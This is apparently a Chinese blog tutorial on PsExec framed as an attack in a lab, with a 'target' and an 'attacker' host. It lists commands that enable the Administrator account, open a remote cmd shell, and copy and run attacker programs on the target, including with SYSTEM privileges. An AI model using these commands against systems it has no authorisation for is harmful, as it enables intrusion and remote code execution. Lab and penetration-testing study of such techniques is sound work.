0x00 什么是PsExec
PsExec是一款功能强大的软件,可以算是一个轻量级的 telnet 替代工具,它旨在作为管理员的便利工具,以便他们可以通过在远程主机上运行命令来执行维护任务。起初主要用于大批量Windows主机的运维,在域内效果不错。但是,攻击者逐渐开始使用PsExec,通过命令行环境和目标机器进行连接,甚至控制目标机器,而不需要通过RDP远程桌面协议进行图形化控制。
0x01 下载地址
PsExec工具包含在远程管理工具包 PsTools 中。下载地址:戳我
0x02 使用方法
目标机IP:192.168.58.129
攻击机IP:192.168.0.104
首先检查目标机是否开启admin$共享:net share
如果没有开启该共享,需要通过修改注册表的方式开启:开启方法
另外别忘记启用Administrator:net user administrator /active:yes
[*]直接连上目标机并返回一个shell
.\PsExec.exe \\192.168.58.129 -u Administrator -p 123 cmd

[*]连上目标机并使其执行攻击机里面的一个程序
.\PsExec.exe \\192.168.58.129 -u Administrator -p 123 -c E:\PortScan.exe
可以看到目标机的任务管理器中显示正在运行PortScan.exe:

[*]连上目标机并执行目标机里面的一个程序
和上面差不多,把-c
换成-d
:
.\PsExec.exe \192.168.58.129 -u Administrator -p 123 -d C:\123.exe
[*]用system权限运行攻击机的程序
使用-s
参数即可:
.\PsExec.exe \\192.168.58.129 -u Administrator -p 123 -s -c C:\test.exe
[*]让目标机看到你运行的程序窗口
使用-i
参数:
.\PsExec.exe \\192.168.58.129 -u Administrator -p 123 -s -i -c E:\摩斯密码翻译器3.28.exe
